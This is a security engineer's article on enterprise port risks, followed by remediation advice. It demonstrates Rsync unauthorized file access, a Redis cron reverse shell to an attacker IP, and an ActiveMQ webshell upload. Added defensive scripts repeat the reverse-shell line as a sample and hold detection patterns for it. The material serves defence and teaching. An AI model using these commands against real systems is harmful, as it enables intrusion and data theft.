*Author: liong03. This article is part of the FreeBuf original article reward program and may not be reproduced without permission.
1. Preface
First, a brief introduction. I am a security engineer, currently working at an internet finance company, responsible for the company's overall network security.
When I first joined the company, I got to know some of the company's rules and the people who make them. My job, of course, is mainly security. As a newcomer, the first task was to understand the company's IT assets. After collecting the IT assets, the next step was to sort out the open ports of each IP asset. Collecting port information is a very important step, because attacking through open ports is a common technique in real-world penetration.
During port collection, several points need attention:
1. Default ports of common applications
2. Banner information of the port
3. Services running on the port
4. Possible vulnerabilities
The most common tools for obtaining port information are nmap (more detailed port information) and Yujian (shows only the open ports, but is very fast). Ports can also be scanned with other host vulnerability scanners, such as Tianjing, Aurora and Nessus.
2. Common port threats
Attacking through ports greatly improves the success rate of penetration. In practice, operations and maintenance (O&M) staff open many ports, and many of the vulnerabilities disclosed on the Internet can be found on them. For an individual this is an opportunity to learn and practise in a ready-made environment, but for an enterprise it is very dangerous.
Why are so many ports open? Some ports that were closed get reopened after a while, and some that were required to be remediated still have not been. Many factors contribute, including differing security awareness and skill among staff. The company has run security awareness training and issued some security technical specifications, but staff turn over and each specialty has its own concerns; some people even regard security checks as fault-finding that slows down releases. Another factor is that most security staff in the O&M department push security management from the bottom up and, more awkwardly, their leaders have changed. I have also found vulnerabilities for other client companies and told them to block the ports and apply patches, but their O&M staff did not remediate; about a week later they were hacked, and then spent a lot of money to have me block the ports and patch. Once you go in-house on the client side, it is like falling into the deep sea...
Most security problems in the O&M department are related to ports and passwords; the situation in the development department is different. Below are some common ports and their possible security problems. Of course, a port must be considered together with its service, and the port list here is not complete. When I see a port I usually think of its service and search Baidu for its possible security vulnerabilities, most of which come from CVE, CNVD, security vendors' advisory numbers and various security forums, including FreeBuf. We have also built an asset service list for the company's specific IP ports, services and software versions, so that when a new vulnerability is disclosed we can quickly know which servers may be at risk.
3. Port vulnerability testing
There are many port-related vulnerabilities. The following three types are common on the intranet; after all, strict port control is usually done on the extranet, and port control on the extranet is much simpler than on the intranet.
3.1 Rsync unauthorized access vulnerability
3.1.1 Vulnerability information
Vulnerability name: Rsync unauthorized access vulnerability
Vulnerability details: Because of improper configuration, Rsync can be accessed without authorization, so server files can be uploaded and downloaded without any authentication.
Rsync is a tool for efficiently transferring and synchronizing files between computer systems by comparing file timestamps and sizes. Normally the administrator starts the Rsync service and runs transfer tasks directly on it. If the Rsync service is not secured, unauthorized access and other security problems follow; the direct consequence is that the transferred data is exposed on the network and accessible to anyone, which brings a serious risk of data leakage.
Vulnerability level: high risk
3.1.2 Vulnerability testing
1、 View leaked files
[email protected]:~# rsync 192.168.3.XXX::
[email protected]:~# rsync 192.168.3.XXX::routing
View the routing directory (module)
2、 Download files
Download the file MFPRDAPP_192.168.3.xxx_report_OS_2018-01-14-01:05:01.txt from the routing directory to the root directory of the attacking machine:
[email protected]:~# rsync -avz 192.168.3.xxx::routing/MFPRDAPP_192.168.3.xxx_report_OS_2018-01-14-01:05:01.txt /root
The file has been downloaded successfully to the root directory of the attacking machine.
3、 Upload a file
Upload the file ylr1801119.jsp from the root directory of the attacking machine to the routing directory of the target server:
[email protected]:~# rsync -avz ylr180119.jsp 192.168.3.xxx::routing
Log in to the 192.168.3.xxx server and see that the file ylr1801119.jsp has been uploaded successfully.
The follow-up steps depend on personal preference; the point here is only to verify that the vulnerability can be used to get into the server.
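One way to catch this misconfiguration before anyone else does is to audit rsyncd.conf for modules that lack "auth users" or "hosts allow", or that allow writes. The following Python script is an added example, not code from the article; the configuration text inside it is constructed, and the module names, paths and user in it are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample rsyncd.conf (not from the article): one weak module, one hardened one.
SAMPLE_RSYNCD_CONF = """
[routing]
    path = /data/routing
    read only = no
[backup]
    path = /data/backup
    read only = yes
    auth users = backupsvc
    hosts allow = 192.168.3.10
"""

def parse_rsyncd_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse rsyncd.conf into {module: {key: value}}; the '' key holds global settings."""
    modules: Dict[str, Dict[str, str]] = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip()
            modules[current] = {}
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            modules[current][key.lower()] = value
    return modules

def audit_rsyncd(text: str) -> Dict[str, List[str]]:
    """Return {module: [findings]} for modules usable anonymously or without IP limits."""
    modules = parse_rsyncd_conf(text)
    findings: Dict[str, List[str]] = {}
    for name, opts in modules.items():
        if not name:
            continue
        merged = {**modules[""], **opts}   # module settings override global ones
        issues = []
        if "auth users" not in merged:
            issues.append("no 'auth users': anyone reaching port 873 can use the module")
        if "hosts allow" not in merged:
            issues.append("no 'hosts allow': no source-IP restriction")
        if merged.get("read only", "yes").lower() in ("no", "false", "0"):
            issues.append("'read only = no': clients can upload files into the module")
        if issues:
            findings[name] = issues
    return findings
```

Run it against the real /etc/rsyncd.conf of each host in the asset list; a module with no findings still needs "secrets file" permissions and a firewall rule on port 873 checked separately.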
3.2 Redis server remote code execution vulnerability
3.2.1 Vulnerability information
Vulnerability name: Redis server remote code execution vulnerability
Exploitation principle: log in to Redis without a password, write content into the Redis cache, and then have Redis save the cache to an arbitrary directory on the Redis server.
Vulnerability level: high risk
3.2.2 Vulnerability testing
To verify the impact of the vulnerability, a test Redis server was set up and attacked.
Test environment:
1) Redis server version: 2.8.17
2) Redis server (target) IP: 192.168.20.105
3) Attacking machine IP: 192.168.20.102
Test process (using a reverse shell to control the server):
1. Because the Redis server sets no access password by default, the attacking machine can directly write a reverse-shell cron entry into the Redis server's cache, to be executed once a minute:
[email protected]:~/redis-2.8.17/src# echo -e "\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/192.168.20.102/8880>&1\n\n"|/root/redis-2.8.17/src/redis-cli -h 192.168.20.105 -p 6379 -x set 1
2. Log in to the Redis service on the Redis server and save the cache as a file named root in the /var/spool/cron directory:
[email protected]:~/redis-2.8.17/src# ./redis-cli -h 192.168.20.105 -p 6379
config set dir /var/spool/cron
config set dbfilename root
save
3. The attacker listens for the reverse shell on the attacking machine, receives the connection from the Redis server, and can then perform any operation.
Of course, there are other exploitation approaches, such as:
1) writing an SSH key and then logging in remotely with it;
2) replacing the Redis server's passwd file;
3) writing a webshell (the website path must be found first).
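A crontab written by a Redis SAVE carries the RDB header and binary metadata around the injected line, which gives the defender a clear forensic signature in the cron spool. The following Python check is an added example, not part of the article; the crontab bytes in it are constructed (the cron line mirrors the one above), and the spool directories are the common Linux defaults.

```python
import os
import re
from typing import Dict, List

CRON_SPOOL_DIRS = ("/var/spool/cron", "/var/spool/cron/crontabs")
RDB_MAGIC = b"REDIS"   # every Redis RDB dump starts with REDIS followed by the version
# Command fragments that belong to a reverse shell rather than a maintenance job.
SUSPICIOUS_CMD = re.compile(rb"/dev/tcp/|bash -i|nc\s+-e|python[23]?\s+-c")

# Constructed sample of a crontab produced by an unauthenticated Redis SAVE into the cron
# spool: RDB header and binary metadata wrapped around the injected cron line.
CONSTRUCTED_RDB_CRONTAB = (
    b"REDIS0006\xfe\x00\x00\x011"
    b"\n\n*/1 * * * * /bin/bash -i >&/dev/tcp/192.168.20.102/8880>&1\n\n"
    b"\xff\x8c\x12\x34\x56\x78\x9a\xbc"
)
CONSTRUCTED_LEGIT_CRONTAB = b"0 3 * * * /usr/local/bin/rotate-reports.sh\n"

def inspect_crontab(data: bytes) -> List[str]:
    """Return findings for one crontab file's bytes; an empty list means nothing suspicious."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("starts with Redis RDB magic: written by a Redis SAVE, not by crontab")
    if any(b < 0x09 or 0x0D < b < 0x20 or b > 0x7E for b in data):
        findings.append("contains non-printable bytes: not a hand-written crontab")
    for line in data.splitlines():
        if SUSPICIOUS_CMD.search(line):
            findings.append("reverse-shell style command: " + line.decode("latin-1").strip())
    return findings

def scan_cron_spool(dirs=CRON_SPOOL_DIRS) -> Dict[str, List[str]]:
    """Walk the cron spool directories and return {path: findings} for flagged files only."""
    results: Dict[str, List[str]] = {}
    for base in dirs:
        if not os.path.isdir(base):
            continue
        for name in os.listdir(base):
            path = os.path.join(base, name)
            if not os.path.isfile(path):
                continue
            with open(path, "rb") as fh:
                findings = inspect_crontab(fh.read())
            if findings:
                results[path] = findings
    return results
```

The same RDB-magic check applies to authorized_keys files and the web root, since the SSH-key and webshell variants listed above write through the same SAVE primitive.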
3.3 Apache ActiveMQ remote code execution vulnerability
3.3.1 Vulnerability information
Vulnerability name: Apache ActiveMQ remote code execution vulnerability
Exploitation principle: log in to Apache ActiveMQ by cracking the account password, write a file into the ActiveMQ fileserver directory, and then save it to any directory on the server with a MOVE request.
Vulnerability level: high risk
3.3.2 Vulnerability testing
1、 Upload a small webshell
First, put a JSP webshell into the fileserver directory:
1. Change PUT /fileserver/%20/%20 to PUT /fileserver/xiaoma.jsp
2. Fill in the webshell content in the request body below
3. Visit http://192.168.20.101:8161/fileserver/xiaoma.jsp, enter the account and password admin/admin to log in, and see that the small webshell has been uploaded successfully
2、 Move the small webshell into the Tomcat directory
MOVE /fileserver/xiaoma.jsp
Destination: file:///root/apache-tomcat-7.0.69/webapps/ROOT/xiaoma2.jsp
3、 Use the small webshell to upload a large webshell
Upload the large webshell shell.jsp using the small webshell's client
4、 Access the large webshell successfully
The large webshell can then be used to manage the server and do whatever you want.
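If the ActiveMQ web console's Jetty request log is enabled, the PUT to the fileserver servlet and the subsequent MOVE are both visible and easy to alert on. The following Python detector is an added example, not part of the article; the log lines are constructed in NCSA format, and the IPs, paths and timestamps in them are assumptions.

```python
import re
from typing import Dict, List

# Constructed Jetty request-log lines (NCSA format); not taken from the article's environment.
SAMPLE_ACCESS_LOG = """\
192.168.20.102 - - [14/Jan/2018:01:05:01 +0800] "PUT /fileserver/xiaoma.jsp HTTP/1.1" 204 0
192.168.20.102 - - [14/Jan/2018:01:05:07 +0800] "MOVE /fileserver/xiaoma.jsp HTTP/1.1" 204 0
192.168.20.102 - - [14/Jan/2018:01:05:20 +0800] "GET /xiaoma2.jsp HTTP/1.1" 200 512
192.168.20.50 - - [14/Jan/2018:01:06:00 +0800] "GET /admin/queues.jsp HTTP/1.1" 200 5120
192.168.20.50 - - [14/Jan/2018:01:06:30 +0800] "GET /fileserver/readme.txt HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
WRITE_METHODS = {"PUT", "MOVE", "DELETE"}   # the fileserver servlet honours all three

def detect_fileserver_abuse(log_text: str) -> List[Dict[str, str]]:
    """Flag successful write-type requests to /fileserver and any JSP staged under it."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue   # skip lines that are not in the expected request-log format
        rec = m.groupdict()
        ok = rec["status"].startswith("2")
        if rec["method"] in WRITE_METHODS and rec["path"].startswith("/fileserver/") and ok:
            rec["reason"] = f'{rec["method"]} to fileserver servlet'
        elif rec["path"].startswith("/fileserver/") and rec["path"].lower().endswith(".jsp"):
            rec["reason"] = "JSP under fileserver"   # a webshell staged for a later MOVE
        else:
            continue
        alerts.append(rec)
    return alerts

def alerts_by_source(log_text: str) -> Dict[str, int]:
    """Count alerts per client IP, the first thing to pivot on during triage."""
    counts: Dict[str, int] = {}
    for a in detect_fileserver_abuse(log_text):
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts
```

The MOVE destination is carried in a request header, so it does not appear in the access log; pair this alert with a file-integrity check on the Tomcat webapps directory to see where the file landed.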
4. About port and password security
Looking across port and password security threats, many cases stem from insecure default configurations, and O&M staff use the default configuration directly for the sake of simplicity. For the safe use of ports and passwords, the following measures are recommended:
1. Configure host firewall and network firewall access control policies as whitelists, so that only specific IPs are allowed to access a specific port of a service.
2. Close unnecessary ports, and in particular do not expose them to the Internet.
(Many trojan tools also use specific ports, and some of these are easily abused by malicious people because of their configuration.)
3. Set strong passwords and change them regularly.
(Password brute-forcing is the simplest technique; combining a dictionary with social engineering is often the most effective way to brute-force.)
4. Use anti-brute-force measures where possible, such as limiting the number of attempts and requiring captchas.
5. Two-factor authentication should be used for important systems wherever possible.
6. Do not transmit account passwords in clear text.
7. Use a VPN connection for remote O&M wherever possible.
8. Run service programs as a non-administrator user where possible.
9. Upgrade versions and apply patches promptly.
A strong password has the following characteristics:
1) Contains both uppercase and lowercase letters;
2) Contains letters, digits and special symbols at the same time, such as: ! @ # $ % ^ & * ( ) + | ~ - = \ ` { } [ ] " ; ' < > ? , . /
3) Is 8 characters or longer;
4) Is not a dictionary word or Pinyin;
5) Is not based on personal information, names or family information.
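The five characteristics above can be turned into a policy check that runs at password-change time. The following Python function is an added example, not code from the article; its word list, the leet substitutions it undoes and the personal_info parameter are assumptions for illustration.

```python
import re
import string
from typing import List

# The article's list of special symbols is a subset of string.punctuation.
SPECIALS = set(string.punctuation)
# Constructed mini word list standing in for a real dictionary plus common Pinyin (assumption).
DICTIONARY = {"password", "welcome", "admin", "mima", "zhongguo", "qwerty"}
# Common symbol-for-letter substitutions, undone before the dictionary check (assumption).
LEET = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "$": "s", "!": "i"})

def check_strong_password(pw: str, personal_info: List[str] = ()) -> List[str]:
    """Return the policy rules the password fails; an empty list means it passes all five."""
    failures = []
    # Rule 1: both cases present.
    if not (any(c.islower() for c in pw) and any(c.isupper() for c in pw)):
        failures.append("needs both upper- and lower-case letters")
    # Rule 2: letters, digits and special symbols together.
    if not (any(c.isalpha() for c in pw) and any(c.isdigit() for c in pw)
            and any(c in SPECIALS for c in pw)):
        failures.append("needs letters, digits and special symbols together")
    # Rule 3: minimum length.
    if len(pw) < 8:
        failures.append("needs 8 characters or more")
    # Rule 4: strip substitutions and symbols, then look for a dictionary word or Pinyin.
    core = re.sub(r"[^a-z]", "", pw.lower().translate(LEET))
    if any(word in core for word in DICTIONARY if len(word) >= 4):
        failures.append("is based on a dictionary word or Pinyin")
    # Rule 5: personal information (name, birthday, family names) supplied by the caller.
    for item in personal_info:
        if len(item) >= 3 and item.lower() in pw.lower():
            failures.append(f"contains personal information ({item})")
    return failures
```

In production the word list would be a real dictionary and a Pinyin syllable list, and the personal_info values would come from the user's directory record.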
5. Security remediation
After collecting the port information, I found many problems and had long talks with the O&M staff and developers. It turns out that O&M staff and developers do not know much about security, and security staff do not know much about O&M and development, at least I did not before. Take ports and weak passwords as an example. The general suggestions a security engineer gives when a problem is found are: change the password and close the port; restrict access by IP; patch or upgrade the version; delete some configuration files. In practice, O&M or development respond:
1) Changing the password involves some application calls, so the configuration has to be changed in several places at once;
2) Other systems need to call these ports, so remediation is very troublesome;
3) The Linux firewall is fine for restricting IPs, but the Windows firewall has many holes, a network firewall change may touch several firewalls, and the firewall policies are already a mess;
4) Some patches cannot be applied and the version cannot be upgraded, or it has even been upgraded and patched already;
5) This problem doesn't seem to have any effect; I'll change it slowly, and it may just fizzle out;
6) Is there a simpler way? I'll choose the simpler one.
I'm just a security engineer, and my leader has been promoted, so I have no strong backing. Fortunately, with so many years of work experience I know a little about O&M and development, and I still have to carry on with the security work:
1) Analyse the remediation methods one by one, discuss their feasibility, even write some operation steps up as manuals, and even write the installation and configuration manual for the anti-virus software;
2) List the risks of each problem, even demonstrate them with a successful penetration if necessary, and issue security notices, security early warnings and so on. This is mainly to draw attention to the problem, and also to avoid being held responsible for it.
With the vulnerabilities successfully exploited and the remediation operation manual in hand, everyone agrees to remediate, and vulnerability tracking then closes the loop.